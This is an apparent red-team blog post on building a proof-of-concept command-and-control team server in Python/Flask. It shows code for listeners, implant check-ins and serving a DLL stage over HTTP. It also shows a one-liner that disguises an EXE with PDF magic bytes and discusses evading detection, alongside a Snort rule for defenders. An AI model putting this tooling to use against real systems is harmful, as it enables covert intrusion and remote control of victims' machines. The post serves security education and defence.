Maelstrom #3: Building the Team Server

In this post we are discussing building a C2 Teamserver, common pitfalls, and the difficulty of identifying singular malicious requests.

Introduction

In the previous post, we discussed the general architecture for a Command & Control framework, including connections from the implant to the server and the execution flow of the implant itself. This post continues that architecture discussion, this time looking at the C2 development considerations around the user interface and experience. We'll also (lightly!) look at designing and protecting the C2's communication channels.

Objectives

This post will cover:

choosing a user interface from command line, thick / thin clients, and browser-based UIs.
choosing a language for the backend to manage the implants (and the interface)
deciding which actions the C2 will handle for the user, including:
listener initialisation
payload generation
communications security
the choices we made for Maelstrom

As we've mentioned previously, most of the discussions we're going to have in this series will focus on the offensive and defensive actions to take on the C2 implant. However, we still felt it would be worth looking at the points listed above because they are relevant to the implant's behaviour and security. We won't (in this post at any rate) look too much at redirectors, channels, and other parts of the red team infrastructure.

Important Concepts

Our preferred way of handling C2 communications is by using a simple API. HTTP exists in almost every client environment, and where it doesn't, traffic can be handled by intermediary devices (such as the aforementioned redirectors and channels which are so interesting that we won't discuss them here).

Our earlier choice to use an object-oriented approach was partially informed by this decision, as the way we modelled the implant helped inform the structure our API should use. By using an OOP approach within the server as well, we found that the API architecture largely wrote itself. Ensuring that the API is written in a logical and predictable fashion makes future changes and additions so much simpler than having to un-spaghetti your spaghetti.

There are infinite ways to interact with a computer program, depending on how pedantic you feel like being. When it comes to C2s, there are three broad camps:

CLI (such as with Posh and Sliver)
Browser based GUI (such as with Covenant and Mythic)
Client-based GUI (such as with Nighthawk, Brute Ratel C4, Havoc, and Cobalt Strike)

These are broad camps, and it's worth stating that a C2 can absolutely have both a command line interface and a graphical interface. Several C2s also support "virtual" CLI interfaces where a browser based GUI mimics or passes through a CLI.

These user interfaces are not necessarily tightly bound to the server itself. C2s, especially corporate C2s or those intended to be part of a wider red team infrastructure, will often come with a separate way to interact with a central "team server". A good example of this is Cobalt Strike, where the main team server is remotely accessed by a client on the operator's local machine.

Design Matters

With a clear design and a usable UI, opsec becomes more than just muscle memory and runes.

Choosing a frontend

Let's look at some examples of contemporary C2s which implement the different options, and some libraries which could help you achieve a similar experience:

Examples

C2s

Libraries worth a look

Web Application

C2s

Libraries worth a look

GUI

C2s

Libraries worth a look

Choosing a backend

Golang was able to handle the loads extremely well, whilst being easy to develop. Rust, on the other hand, was up and down whilst being a lot more difficult to actually write. Admittedly, this server was not a malware-oriented team server, but the data is something to consider.

With that said, we are going to work with Flask/Python, purely out of ease for this demonstration.

One final note here before we move on to code - outside of what we're discussing, this code is deliberately dependent on insecure behaviours. Maelstrom is just for demonstration purposes. Some of these red herrings will become obvious throughout the next few blog posts.

Quick talk on Protocols

When it comes to communication, there are a multitude of protocols that should be considered.

HTTP

URIs
Headers
Body

Let's take a look at an example:

GET /endpoint/form HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

licenseID=string&content=string&/paramsXML=string

licenseID=string&content=string&/paramsXML=string&C2Info=AAAAAA
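As a rough illustration of the second body above, the extra C2Info field can be pulled out of an otherwise ordinary-looking form body with the standard library. This is only a minimal sketch: extract_c2_field is a hypothetical helper of ours and not part of Maelstrom, and a real server would also need to decode whatever is stored in the field.

```python
from typing import Optional
from urllib.parse import parse_qs


def extract_c2_field(body: str, field_name: str = "C2Info") -> Optional[str]:
    """Return the value of one form field, or None if it is absent.

    field_name defaults to the C2Info parameter from the example body;
    the helper itself is hypothetical.
    """
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get(field_name)
    return values[0] if values else None


# the two example bodies shown above
benign = "licenseID=string&content=string&/paramsXML=string"
tasked = benign + "&C2Info=AAAAAA"

print(extract_c2_field(benign))
print(extract_c2_field(tasked))
```

The point is that both bodies parse as normal form data; only a consumer that knows which field to look for treats the second one differently.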

To be honest, explaining HTTP specifically for C2 communication could be an entire blog in and of itself, so we will leave HTTP here. This is, however, the communication we will be using for our proof-of-concept.

DNS

Today, the DNS Beacon can download tasks over DNS TXT records, DNS AAAA records, or DNS A records. This payload has the flexibility to change between these data channels while its on target. Use Beacon’s mode command to change the current Beacon’s data channel. mode dns is the DNS A record data channel. mode dns6 is the DNS AAAA record channel. And, mode dns-txt is the DNS TXT record data channel. The default is the DNS TXT record data channel.

The only issue with this is that it's substantially slower than HTTP, but it provides better protection as these channels are less inspected than HTTP.

SMB

Similarly to DNS, this is something we aren't implementing. However, we do recommend implementing this protocol, whereas DNS is somewhat optional and dependent on the use case for the end-user.

Introducing Maelstrom

Now that we have overloaded you with options, let's look into how Maelstrom is going to work.

Server

First up, the server. This is the component that the implant will respond to. So, when maelstrom.py is run in the terminal, the following is printed:

usage: Maelstrom [-h] {server,payload} ...

positional arguments:
  {server,payload}  Start Server | Generate Payloads
    server          Start the Maelstrom Server
    payload         Generate a Maelstrom Payload

optional arguments:
  -h, --help        show this help message and exit

Example:
  - Run Server:
    python3 maelstrom.py server
    
  - Generate Payload:
    python3 maelstrom.py payload

There are two options:

Run the server
Generate a payload

However, we are only implementing the server:

def main() -> None:
    args = Args.get_args()
    if args.which == 'server':
        run_maelstrom()

    return

if __name__ == "__main__":
    main()

Let's step through run_maelstrom()...

The very first thing it does is get the available commands:

commands: dict = get_commands()

Where get_commands() is:

def get_commands() -> dict:
    """convert the list of commands into the complete data structure"""
    cs: dict = {}

    commands: list = available_commands()
    for command in commands:
        cs[command.name] = command.sub_args

    return cs

This function parses the return of available_commands and builds out a dictionary of the required info.

In Maelstrom these commands are somewhat hardcoded, limiting its extensibility:

def available_commands() -> list:
    """Store all the commands and return as a list of dataclasses"""
    
    exit_cmd: Command = Command(
        'exit',
        'Exit Maelstrom','Exit Maelstrom',
        None)

    help_cmd: Command = Command(
        'help',
        'Show all the available commands',
        'Show all the available commands',
        None)

    set_cmd: Command = Command(
        'listener',
        'Start a new listener',
        'Start a new listener by specifying a host, port, uri, and password',
        None)

    show_cmd: Command = Command(
        'show',
        'Show listeners|implants',
        'Show listeners|implants',
            {
                "listeners": None,
                "implants": None
            }
        )

    # return all command dataclasses as a list
    return [exit_cmd, help_cmd, set_cmd, show_cmd]

from dataclasses import dataclass, field

@dataclass(order=True)
class Command:
    """Dataclass to hold the command info"""

    # command name
    name: str

    # command description (long)
    long_desc: str

    # command description (short)
    short_desc: str

    # sub arguments
    sub_args: dict     

    # order=True already makes Command instances sortable: the generated
    # comparison methods compare fields in declaration order (name first),
    # so no extra sort hook is needed here

So, get_commands() again:

def get_commands() -> dict:
    """convert the list of commands into the complete data structure"""
    cs: dict = {}

    commands: list = available_commands()
    for command in commands:
        cs[command.name] = command.sub_args

    return cs

Running the server and typing help shows this:

These match up to the dataclasses seen earlier:

exit_cmd: Command = Command(
    'exit',
    'Exit Maelstrom','Exit Maelstrom',
    None)

help_cmd: Command = Command(
    'help',
    'Show all the available commands',
    'Show all the available commands',
    None)

set_cmd: Command = Command(
    'listener',
    'Start a new listener',
    'Start a new listener by specifying a host, port, uri, and password',
    None)

show_cmd: Command = Command(
    'show',
    'Show listeners|implants',
    'Show listeners|implants',
        {
            "listeners": None,
            "implants": None
        }
    )

Because this is a lazy implementation of the server, the next thing to happen is a big while loop which gives a prompt and parses commands:

# bool used to control the while loop
execute: bool = True

# username to print
username: str = getpass.getuser()

# run until told otherwise
while execute:

    # get the user input
    user_input: str = prompt(f'[{username}]> ', completer=completer)

    # if nothing is passed, just continue
    if not user_input: continue

    # Exit
    if user_input.startswith('exit'):
        execute = False

    # Help
    elif user_input.startswith('help'):
        print_help(user_input)

    # Listener
    elif user_input.startswith('listener'):
        handle_listener(user_input)

    elif user_input.startswith('show'):
        handle_show(user_input)
return
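As a less lazy alternative to the if/elif chain, the same routing could be driven by a dictionary of handlers. The following is a minimal sketch under our own assumptions: the handler bodies are stand-ins that only return a label, and dispatch is a hypothetical name. Matching on the first word, rather than with startswith, also means that input such as "showme" is no longer treated as "show".

```python
from typing import Callable, Dict


# Hypothetical stand-ins for Maelstrom's real handlers; here they only
# return a label so the routing can be demonstrated without a server.
def print_help(user_input: str) -> str:
    return "help"


def handle_listener(user_input: str) -> str:
    return "listener"


def handle_show(user_input: str) -> str:
    return "show"


# command name -> handler function
HANDLERS: Dict[str, Callable[[str], str]] = {
    "help": print_help,
    "listener": handle_listener,
    "show": handle_show,
}


def dispatch(user_input: str) -> str:
    """Route on the first word of the input only."""
    words = user_input.split()
    if not words:
        return "empty"
    if words[0] == "exit":
        return "exit"
    handler = HANDLERS.get(words[0])
    return handler(user_input) if handler else "unknown"


print(dispatch("listener 127.0.0.1 5555 /some-uri PassWoRd1"))
print(dispatch("showme"))
```

Adding a command then becomes a one-line change to the dictionary rather than another branch in the loop.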

The ONLY functionality Maelstrom provides is the ability to create listeners and show connected implants. However, let's discuss post-exploitation briefly (we discuss this in a bit more depth much later in the series).

For the sake of the discussion, our example command will be whoami. If you were to go onto the C2 Matrix, and pick a C2 that isn't .NET, you'd have a 90% chance of getting this:

cmd.exe /c whoami

Which will subsequently produce the following process tree:

-> implant.exe
  -> cmd.exe
    -> whoami.exe

BOOL GetUserNameA(
  [out]     LPSTR   lpBuffer,
  [in, out] LPDWORD pcbBuffer
);

So... why not call GetUserNameA directly and skip the child processes altogether:

CHAR lpUserName[MAX_PATH];
DWORD nSize = MAX_PATH;

if (!GetUserNameA(lpUserName, &nSize))
{
    return NULL;
}

std::string GetProcessCurrentDirectory() {
    PRTL_USER_PROCESS_PARAMETERS processParams = (PRTL_USER_PROCESS_PARAMETERS)_pPEB->ProcessParameters;
    UNICODE_STRING us = processParams->CurrentDirectoryPath;

    std::wstring ws(us.Buffer, us.Length / 2);
    std::string ss(ws.begin(), ws.end());
    return ss;
}

More on this in a later part. For now, listeners!

Listeners

Let's take a look at how we implemented listener creation. If the user input on the CLI starts with listener, then the handle_listener() function is called:

elif user_input.startswith('listener'):
    handle_listener(user_input)

The first thing it does is look for a space in the input, as a cheap check that some arguments were supplied at all:

def handle_listener(user_input: str) -> None:
    usage = 'Usage: listener <host> <port> <base uri> <password>'
    if ' ' not in user_input:
        print(usage)
        return

If that is fine, it then splits on the space and counts the length. If it's not 5, then the command is wrong:

# split out the command
split: list = user_input.split(' ')

# make sure all the components are passed
if len(split) != 5:
    print(usage)
    return

Note the usage here:

usage = 'Usage: listener <host> <port> <base uri> <password>'

A valid input would be:

listener 127.0.0.1 5555 /some-uri PassWoRd1
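The checks above only count the pieces. As a sketch of what slightly stricter parsing might look like, the helper below also checks the command name, the port range, and the shape of the URI. The names parse_listener_args and ListenerArgs are hypothetical, and the rule that the base URI must start with "/" is our assumption rather than something Maelstrom enforces.

```python
from typing import NamedTuple, Optional


class ListenerArgs(NamedTuple):
    host: str
    port: int
    uri: str
    password: str


def parse_listener_args(user_input: str) -> Optional[ListenerArgs]:
    """Parse 'listener <host> <port> <base uri> <password>' or return None."""
    # split() with no argument collapses repeated whitespace, unlike split(' ')
    parts = user_input.split()
    if len(parts) != 5 or parts[0] != "listener":
        return None

    _, host, port_text, uri, password = parts

    # the port must be a number inside the valid TCP range
    try:
        port = int(port_text)
    except ValueError:
        return None
    if not 1 <= port <= 65535:
        return None

    # assumption: the base URI is an absolute path
    if not uri.startswith("/"):
        return None

    return ListenerArgs(host, port, uri, password)


print(parse_listener_args("listener 127.0.0.1 5555 /some-uri PassWoRd1"))
print(parse_listener_args("listener 127.0.0.1 http /some-uri PassWoRd1"))
```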

As the first index, 0, should be the command name, it attempts to validate it:

# use the first element to get the command object
command: Command = get_a_command(split[0])

# if it doesn't exist, return
if not command:
    print('Failed to find command!')
    return

Like so:

from typing import Optional

def get_a_command(select: str) -> Optional[Command]:
    """Get a specific command, or None if no command has that name"""
    return next((c for c in available_commands() if select == c.name), None)

The returned dataclass is never used; it is only checked to confirm that the command is valid. Now that it is, the Listener dataclass can be populated with the supplied information, like so:

# split[0] is the command name, so the listener arguments start at index 1
listener: Listener = Listener(random_string(), split[1], split[2], split[3], split[4])

Where the dataclass is:

@dataclass(order=True)
class Listener:
    """Dataclass to hold the listener info"""

    # name
    name: str
    
    # listener address
    address: str

    # port
    port: int

    # uri
    uri: str

    # password
    password: str

This is then appended to a global list:

# add the listener to the list
listeners.append(listener)

This is obviously not persistent. Realistically, this should be a database which is checked and restored if the server is restarted.
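As a sketch of what that persistence could look like, the snippet below stores listeners in SQLite using only the standard library. Everything here is an assumption for illustration: the table layout, the function names, and the in-memory database used for the demo are ours, and Maelstrom itself does none of this. Note that the password is stored in plaintext, which a real team server should avoid.

```python
import sqlite3
from dataclasses import astuple, dataclass
from typing import List


@dataclass
class Listener:
    """Mirrors the fields of the Listener dataclass used in this post."""
    name: str
    address: str
    port: int
    uri: str
    password: str


def open_db(path: str = ":memory:") -> sqlite3.Connection:
    """Open the database and create the (assumed) listeners table."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS listeners ("
        "name TEXT PRIMARY KEY, address TEXT, port INTEGER, uri TEXT, password TEXT)"
    )
    return conn


def save_listener(conn: sqlite3.Connection, listener: Listener) -> None:
    """Insert or update one listener using a parameterised query."""
    with conn:  # commits on success, rolls back on error
        conn.execute(
            "INSERT OR REPLACE INTO listeners VALUES (?, ?, ?, ?, ?)",
            astuple(listener),
        )


def load_listeners(conn: sqlite3.Connection) -> List[Listener]:
    """Rebuild the listener list, for example after a server restart."""
    rows = conn.execute(
        "SELECT name, address, port, uri, password FROM listeners ORDER BY name"
    )
    return [Listener(*row) for row in rows]


conn = open_db()
save_listener(conn, Listener("abc123", "127.0.0.1", 5555, "/some-uri", "PassWoRd1"))
restored = load_listeners(conn)
print(restored)
```

On startup the server would call load_listeners() and start a thread for each row, instead of beginning with an empty global list.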

Next, the dataclass is used as an argument for a thread:

# start a thread pointing at the start_server function
try:
    thread = threading.Thread(target=start_server, args=(listener,))
    thread.daemon = True
    thread.start()
    logger.good(f'Started: [{listener.name}] http://{listener.address}:{listener.port}{listener.uri} ({listener.password})')
except Exception as e:
    logger.bad(f'Failed to start listener: {str(e)}')

return

def start_server(listener: Listener) -> bool:
    """callback function to start a server"""
    # add the uri
    app.add_url_rule(listener.uri, view_func=comms)

    # start the app
    try:
        app.run(host=listener.address, port=listener.port, debug=False, threaded=True)
        return True
    except Exception:
        return False

This completes the listener creation:

This can be validated by running:

curl -s "http://10.10.11.205:5555/a?stage" -H "X-Maelstrom: password"|xxd|head

Which produces:

So, how does the implant communicate with this?

Payloads

if os.system(f"make -f {make_file_path} dll 2>/dev/null 1>&2") == 0:
    print("success")
else:
    print("failure")

More on what to consider for payload generation in the next blog post.

Implant Communication

At this point in the post, we have an up-and-running team server which can create a listener. Now we need to look at what the endpoints actually do with incoming traffic to:

Determine if it's an implant
If it is, allow the implant to communicate

Handling HTTP Requests

Earlier in the post, we showed the listener being started as a new app, like so:

app.run(host=listener.address, port=listener.port, debug=False, threaded=True)

In a typical Flask fashion, app is defined globally:

app = Flask(__name__)

And one function on / is created to handle all requests. We could start an endpoint for each type, but we found it easier to listen at the root, and filter down with logic. This allows us to log ALL requests, whilst meticulously filtering requests by their expected values.

The route:

@app.route('/', methods=["GET"])
def comms() -> Response:
    pass

Let's run through what happens inside this route. In the previous section, we created an endpoint on /a, so we will use that example.

First thing that happens here is that a bunch of information is pulled from the request object, things that we may or may not use:

user_agent = request.environ["HTTP_USER_AGENT"]
verb = request.environ["REQUEST_METHOD"]
uri = request.environ["RAW_URI"]
remote_addr = request.environ["REMOTE_ADDR"]
remote_port = request.environ["REMOTE_PORT"]
server_name = request.environ["SERVER_NAME"]
server_port = request.environ["SERVER_PORT"]
url = request.url
header = request.headers.get('X-Maelstrom')

Note the request.headers.get call. This is one of the hard-coded values sent between the client and server.

This information is then passed to the is_valid_listener function:

if not is_valid_listener(listeners, uri, server_name, server_port, header): return response

This just ensures that the dataclass information matches up to the request by ensuring that the URI, Server Address, Server Port, and Header are all correct:

def is_valid_listener(listeners: list, uri: str, server_name: str, server_port: str, header) -> bool:
    """ensure that the request is valid for the endpoints."""
    for listener in listeners:
        # The 'in' here is important. This is what allows for the rest of the uri to be valid. I.E: /a?aaaaa would work.
        if listener.uri in uri and listener.address == server_name and str(listener.port) == server_port and listener.password == header:
            return True
    return False

This is an extremely primitive example of ensuring the request is as intended...
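For comparison, a slightly less primitive variant is sketched below. It is not how Maelstrom works: is_valid_listener_strict is a hypothetical name, and the two changes (matching the path exactly instead of using "in", and comparing the header with hmac.compare_digest) are our own suggestions. With the original check, a request for /evil/a?stage would also match a listener on /a.

```python
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional
from urllib.parse import urlsplit


@dataclass
class Listener:
    """Same fields as the Listener dataclass shown earlier."""
    name: str
    address: str
    port: int
    uri: str
    password: str


def is_valid_listener_strict(
    listeners: Iterable[Listener],
    uri: str,
    server_name: str,
    server_port: str,
    header: Optional[str],
) -> bool:
    """Match the path exactly and compare the secret in constant time."""
    if header is None:
        return False
    # only the path has to match; the query string (e.g. ?stage) may vary
    path = urlsplit(uri).path
    for listener in listeners:
        if (
            path == listener.uri
            and listener.address == server_name
            and str(listener.port) == server_port
            and hmac.compare_digest(listener.password.encode(), header.encode())
        ):
            return True
    return False


demo = [Listener("abc123", "10.10.11.205", 5555, "/a", "password")]
print(is_valid_listener_strict(demo, "/a?stage", "10.10.11.205", "5555", "password"))
print(is_valid_listener_strict(demo, "/evil/a?stage", "10.10.11.205", "5555", "password"))
```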

If it is valid, then the next chunk of code determines which type of request this is:

switch: str = ''

# if no data is passed
if len(request.data) == 0:
    # check if the uri contains ?stage
    if check_uri_for_stage(uri):
        # if it does, set 'switch' to 'stage'
        switch = 'stage'
else:
    # otherwise, see whats going on in the json
    j = parse_json(request.data)
    if not j: return response

    if len(j.keys()) != 1: return response

    switch: str = list(j.keys())[0]

In this case, it only has two options:

init
stage

In a real-world example, init and stage are terrible endpoints. But this allows us to illustrate our point. This is then followed up with:

# if the switch is init:
if switch == "init":
    # add the implant data to the 'db' and keep track of it
    response = initialise_implant(j, request)
elif switch == "stage":
    # otherwise if it's stage, return the dll
    response = get_maelstrom_dll()
else:
    # uh-oh...
    response = ""

# return the response
return response
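The helpers check_uri_for_stage() and parse_json() are not shown in this post, so the following is a self-contained sketch of the same decision with our own guesses at their behaviour. classify_request is a hypothetical name, and returning an empty string for anything unrecognised is an assumption that mirrors the fall-through case above.

```python
import json
from typing import Optional
from urllib.parse import urlsplit


def check_uri_for_stage(uri: str) -> bool:
    """Assumed behaviour: true when the query string is exactly 'stage'."""
    return urlsplit(uri).query == "stage"


def parse_json(data: bytes) -> Optional[dict]:
    """Assumed behaviour: return the decoded JSON object, or None on failure."""
    try:
        parsed = json.loads(data)
    except ValueError:  # covers invalid JSON and undecodable bytes
        return None
    return parsed if isinstance(parsed, dict) else None


def classify_request(data: bytes, uri: str) -> str:
    """Return 'stage', the single top-level JSON key, or '' if nothing matches."""
    if len(data) == 0:
        return "stage" if check_uri_for_stage(uri) else ""
    parsed = parse_json(data)
    if not parsed or len(parsed) != 1:
        return ""
    return next(iter(parsed))


print(classify_request(b"", "/a?stage"))
print(classify_request(b'{"init": {"username": "bob"}}', "/a"))
```

Pulling the decision into one pure function like this also makes it easy to unit test without a running Flask app.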

If it's of type init, then initialise_implant() simply parses the info and prints a new connection, that's all:

def initialise_implant(j: dict, request) -> str:
    """Store the beacon info and return a success message"""

    try:
        processname: str = j["init"]["processname"]
        computername: str = j["init"]["computername"]
        username: str = j["init"]["username"]
        pid: int = j["init"]["dwpid"]
        remote_addr = request.environ["REMOTE_ADDR"]
        remote_port = request.environ["REMOTE_PORT"]
        uid = random_string()

        implant: Implant = Implant(uid, remote_addr, remote_port, processname, computername, username, pid)
        
        implants.append(implant)
        logger.good(f"New Implant: ({uid}) {computername}\\{username} @ {remote_addr}:{remote_port}")
        return "success"
    except Exception as e:
        logger.bad(f"Failed to add implant: {str(e)}")
        return "failure"

There is poor error handling, no database tracking, nothing. Realistically, here there is a requirement for logging. No matter the request, it should be logged into a uniform format. Typically, what we found best with our projects is to use a file where each line is a JSON Object:

{"example": 0}
{"example": 1}
{"example": 2}
{"example": 3}
{"example": 4}
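A minimal sketch of this one-object-per-line format, using only the standard library, could look like the following. The function names and the field names in the demo records are illustrative assumptions, not Maelstrom's actual logging code.

```python
import json
import os
import tempfile
from typing import Iterator


def log_request(path: str, record: dict) -> None:
    """Append one record to the log as a single JSON line."""
    with open(path, "a", encoding="utf-8") as f:
        f.write(json.dumps(record, sort_keys=True) + "\n")


def read_log(path: str) -> Iterator[dict]:
    """Yield each non-empty line of the log as a dict."""
    with open(path, "r", encoding="utf-8") as f:
        for line in f:
            if line.strip():
                yield json.loads(line)


# demo against a temporary file; the field names are illustrative only
log_path = os.path.join(tempfile.mkdtemp(), "requests.jsonl")
log_request(log_path, {"verb": "GET", "uri": "/a?stage", "remote_addr": "10.10.11.222"})
log_request(log_path, {"verb": "GET", "uri": "/favicon.ico", "remote_addr": "10.10.11.222"})

records = list(read_log(log_path))
print(len(records))
```

Because every line is a complete object, a truncated or corrupt line only costs that one record rather than the whole file.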

This is then easy to process by either:

Looping over every line and loading each line as a JSON Object

Ingesting it with a Logstash pipeline such as:

input {
    beats {
        port => 5044
    }

    tcp {
        port => 5000
    }

    http {
        port => 5043
    }
}

filter {
  json {
    source => "message"
      tag_on_failure => [ "_parsefailure", "parsefailure-critical", "parsefailure-json_codec" ]
      remove_field => [ "message" ]
      skip_on_invalid_json => true
  }
}

output {
    elasticsearch {
        hosts => "elasticsearch:9200"
        user => "logstash_internal"
        password => "${LOGSTASH_INTERNAL_PASSWORD}"
    }
}

Or a POST:

import json
import requests

def post_to_logstash(data: dict, url: str) -> bool:
    """Post the json to the logstash url"""
    try:
        response = requests.post(
            url,
            data=json.dumps(data),
            headers={"Content-Type": "application/json"},
            timeout=10,
        )
        # treat HTTP error statuses as failures rather than ignoring the response
        response.raise_for_status()
        return True
    except Exception as e:
        bad(f"Failed to post to {url}: {str(e)}")
        return False

Depending on the project, we will use one of these methods.

Moving on to the staging endpoint, the contents of a DLL at a hardcoded path are returned:

from pathlib import Path

def get_maelstrom_dll() -> bytes:
    """Read bytes from the DLL and return it!"""

    dllpath = Path('agent/stage1/bin/maelstrom.x64.dll')

    if not dllpath.exists():
        logger.bad(f"{dllpath.name} doesn't exist!")
        return b""

    try:
        # read the whole DLL into memory
        with open(dllpath, 'rb') as f:
            dllbytes: bytes = f.read()
    except Exception as e:
        logger.bad(f'Failed to get {dllpath.name}: {str(e)}')
        return b""

    if dllbytes:
        logger.info(f'Sending Stage 1 ({len(dllbytes)} bytes)!')

    # an empty file falls through here and returns b""
    return dllbytes

Again, this is intentional. We don't care for making this fancy, it's a proof-of-concept. In the next section, we go over some methods of masking the DLL, and this is where that logic would go. But, for Maelstrom, we just return the bytes of a hard-coded DLL Path.

From here, multiple switches could be implemented to do specific jobs, like getting a new task or returning information about a task that was run. Each of these endpoints could be configured differently, giving flexibility within the communication.

To recap, in this section we've shown two hard-coded endpoints, init and stage, and then filtered down the requests based on expected information. To illustrate our point, we've just used X-Maelstrom as the header. But realistically this could be something that looks genuine, like an ASPSESSIONID cookie. All we are doing is making sure that only very specific requests can communicate with the teamserver.

Inspecting the requests

http && ip.src_host == 10.10.11.222 && ip.dst_host == 10.10.11.205

Remember, the only thing this does is stage. There are no additional requests:

The above shows the /a?stage URI being requested, along with our poorly configured headers:

GET /a?stage HTTP/1.1
Connection: Keep-Alive
Referer: https://google.com
User-Agent: Maelstrom
X-Maelstrom: password
Host: 10.10.11.205:5555

And as this is a stage, if we follow it in TCP Stream...

alert tcp any any -> any 5555 (content:"X-Maelstrom"; msg:"Maelstrom Header Detected!"; sid:10000100; rev:005;)

Which looks something like this:

There are tons of improvements that could be made here, and it could get complicated very quickly with all sorts of masquerading and cryptography. However, it doesn't need to be that complicated (some people may need it to be, though). As long as the HTTP Requests are fully customizable by the end-user, then the request can be crafted however it needs to be. For those complicated engagements with every log being ingested, then cool, the request can be worked to fix that. Don't need anything? Cool, then just request /stage.

client {
     parameter "id" "1234"; 
     header "Cookie" "SomeValue";
}

What is particularly good is their chained data manipulation:

server {
     header "Content-Type" "image/gif"; 
     output {
          prepend "GIF89a"; 
          print;
     }
}

In the above, the GIF89a signature (the magic bytes of a GIF) is prepended to the start of the output. Alternatively, the same could be done by prepending PNG magic bytes.

As an example implementation with a PDF, assume the following data is the magic bytes for a PDF:

%PDF-1.4

\x25\x50\x44\x46\x2d\x31\x2e\x34

Then, with the following command, prepend those bytes to an EXE:

echo -n -e '\x25\x50\x44\x46\x2d\x31\x2e\x34' | /usr/bin/cat - maelstrom.unsafe.x64.exe > maelstrom.unsafe.pdf.exe

Finally, running file on both:

Now all that needs to happen is the first 8 bytes are removed from the buffer...
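That removal step is small enough to sketch. In a real implant this would live in the C/C++ loader; the Python below is only an illustration, and the names mask and unmask are hypothetical. The constant is the same 8 bytes used in the echo command above.

```python
PDF_MAGIC = b"%PDF-1.4"  # the 8 bytes prepended by the echo command


def mask(payload: bytes, magic: bytes = PDF_MAGIC) -> bytes:
    """Server side: prepend the magic bytes to the payload."""
    return magic + payload


def unmask(buffer: bytes, magic: bytes = PDF_MAGIC) -> bytes:
    """Client side: verify the prefix, then strip it off the buffer."""
    if not buffer.startswith(magic):
        raise ValueError("buffer does not start with the expected magic bytes")
    return buffer[len(magic):]


original = b"MZ\x90\x00" + b"\x00" * 12  # stand-in for the start of a PE file
masked = mask(original)

print(masked[:8])
print(unmask(masked) == original)
```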

Extensible Obfuscation and Encryption

From a user experience standpoint, these behaviours can easily be extended by the server. These steps should be invisible to the operator, but applying them should be straightforward. Older C2s were more reliant on users customising this behaviour directly, by modifying the implants and droppers, if it was changeable at all. At most, a C2 might allow the endpoint to be changed, but even this was less common.

Supporting these behaviours with the extensible approach to implant development we outlined in the previous post, using simple software development practices, massively improves the opsec of the implant. Buzzwords like polymorphic code and military-grade encryption aren't helpful when discussing these steps, since so many contemporary C2s still rely on these opsec behaviours being hard-coded. This results in red teams who have a C2 with one opsec implant, rather than a C2 with a library of modular steps capable of generating infinite opsec implants.

For example, the following behaviours could be added to a C2's payload generation to further obfuscate implant data:

Hardcoded embedded environment keying where keys are generated on a payload by payload basis (coming next week!)
Obfuscation steps such as XOR and encryption
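As a minimal sketch of the second item, a repeating-key XOR with a key generated fresh for each payload might look like this. The function names are hypothetical, and XOR on its own is obfuscation rather than encryption; it is shown here only because it is the simplest step that could be slotted into a modular pipeline.

```python
import secrets


def generate_key(length: int = 16) -> bytes:
    """Generate a fresh random key for each generated payload."""
    return secrets.token_bytes(length)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


key = generate_key()
plaintext = b"stage two configuration"
obfuscated = xor_bytes(plaintext, key)

# the implant would carry the key and reverse the step at runtime
print(xor_bytes(obfuscated, key) == plaintext)
```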

Obviously, these are completely rudimentary but it proves the point. Blue teams know that big blobs of high entropy data going back and forth between never-before-seen Azure and AWS instances are a lil' sus. As live traffic inspection becomes more widespread, we anticipate that C2s will shift to a more modular approach where implants can switch their data obfuscation and encryption on the fly, reducing the ability of a blue team to identify an implant.

This post has been a little lighter on the blue team side of affairs for a simple reason - this is really difficult to identify already at a network level, in the world of hardcoded implant opsec, without including any other factors like destinations, EDR flags, or other heuristics. Identifying a single malicious request every 20 minutes to 2 hours, travelling over an established channel such as Microsoft Teams, is like trying to find a needle in a haystack made of needles. Only by paying close attention to endpoint telemetry, and by deep-packet inspection of all network traffic to look for anything specific when a process is flagged as suspicious, can these be identified. Ensuring that your EDR and network devices are up-to-date with domain reputation and threat intelligence feeds, and that these are being ingested appropriately, may go some way to closing this gap.

To recap:

Maelstrom's communication is extremely simple. With that said, it's quite unlikely that a tool will spot these requests unless specifically told to. A good analyst may spot them, but this again is unlikely. Remember, we made it this way on purpose.
Ensure that the requests are fully malleable for end-users. Even though we gave an example using file magic bytes, the data could also be embedded into something else, like a base64 blob inside JavaScript placed in the body of the request:

function F()
{
    var blob = "something base64";
}
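To make the idea concrete, here is a small sketch of both sides: wrapping bytes into that JavaScript function and pulling them back out. The names embed and extract, the template, and the regular expression are all our own assumptions for illustration.

```python
import base64
import re

# JavaScript wrapper matching the snippet above; doubled braces are
# str.format() escapes for literal { and }
TEMPLATE = 'function F()\n{{\n    var blob = "{blob}";\n}}\n'

# matches the base64 alphabet between the quotes of the blob assignment
BLOB_PATTERN = re.compile(r'var blob = "([A-Za-z0-9+/=]*)";')


def embed(data: bytes) -> str:
    """Server side: base64-encode the data and place it in the script."""
    encoded = base64.b64encode(data).decode("ascii")
    return TEMPLATE.format(blob=encoded)


def extract(script: str) -> bytes:
    """Client side: locate the blob in the script and decode it."""
    match = BLOB_PATTERN.search(script)
    if match is None:
        raise ValueError("no blob found in script")
    return base64.b64decode(match.group(1))


script = embed(b"hello")
print(script)
print(extract(script))
```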

Conclusion

This post has been more of a reference post; depending on the type of user experience, there are tons of different methods. For Maelstrom, it's only going to be a basic Python CLI with the Prompt Toolkit.

Now that this has all been set up, we can finally get into coding the implant in the next post!

We mentioned at the start that we wouldn't be addressing channels, redirectors, or other parts of the red team infrastructure. As some honourable mentions, the following three blogs are a great starting point:
